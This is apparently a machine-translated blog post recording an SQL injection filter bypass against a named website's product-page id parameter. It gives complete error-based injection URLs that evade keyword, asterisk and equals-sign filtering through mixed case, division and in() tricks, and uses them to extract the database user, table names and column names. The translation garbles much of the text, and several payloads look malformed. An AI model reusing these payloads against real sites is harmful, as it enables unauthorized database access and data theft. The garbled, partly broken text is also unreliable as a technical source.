Record a simple SQL bypass to prevent injection of Chrysanthemum

The target site is replaced by www.cnseay.com.

 

Open the website and open a product page. In? Id = 62 followed by single quotes, such

It is determined that the parameter id is not protected by single quotes, and GPC is enabled. It is much easier to avoid single quotes.

However, the following problems were found after testing:

1. Common injection keywords such as union, select, from, asterisks (*), and equal signs are replaced with null.

2. parameters are used by Multiple SQL statements. Only the first statement can be used for double query error injection.

 

OK. Now that we know the limitations, we can try to bypass the method.

 

 

The test shows that. Keywords such as union, select, and from can be case-insensitive.

 

OK. You can use double queries to obtain the data. Commonly used double query statements:

(Select 1 from (select count (*), concat (floor (rand (0) * 2), (select user () a from information_schema.tables group by a) B)

We can see that there is a star number, and the asterisks will be replaced with null, so we don't need the asterisks.

At the first asterisk: count (*) I replace it with count (1 ).

At the second asterisk: floor (rand (0) * 2) What should I do?

It's actually very simple. 1*2 = ??? Is it equal to 2? What about multiplication and division?

That is 1/0. 5 or 2.

 

What about equal signs ??

We can use a bypass value greater than or less.

Therefore, the final statement is:

Http://www.2cto.com/show_content.php? Id = 62 anD cate_parent> (selecT 1 fRom (selecT count (1), concat (floor (rand (0)/0.5), (select USER ())) a frOm information_schema.tables gRoup by a) B)-1

 

 

 

What about querying other table data?

Union select 1, 2,..., group_concat (table_name) from information_schema.tables where table_schema = database ()

There is an equal sign here. How to get around ???????

 

 

You can use in () to query.

Explosive Table Name:

Http://www.cnseay.com/show_content.php? Id = 62 anD cate_parent> (selecT 1 fRom (selecT count (1), concat (floor (rand (0)/0.5 ), (selEct table_name fRom information_schema.tables wHere table_schema in (database () limIt) a frOm information_schema.tables gRoup by a) B)-1 burst column name: http://www.cnseay.com/show_content.php? Id = 62 anD cate_parent> (selecT 1 fRom (selecT count (1), concat (floor (rand (0)/0.5 ), (selEct column_name fRom information_schema.columns whEre table_name in (char (101,100,117, 99,109,115, 100,109,105,110,) aNd table_schema in (database () limIt) a frOm information_schema.tables gRoup by) b)-1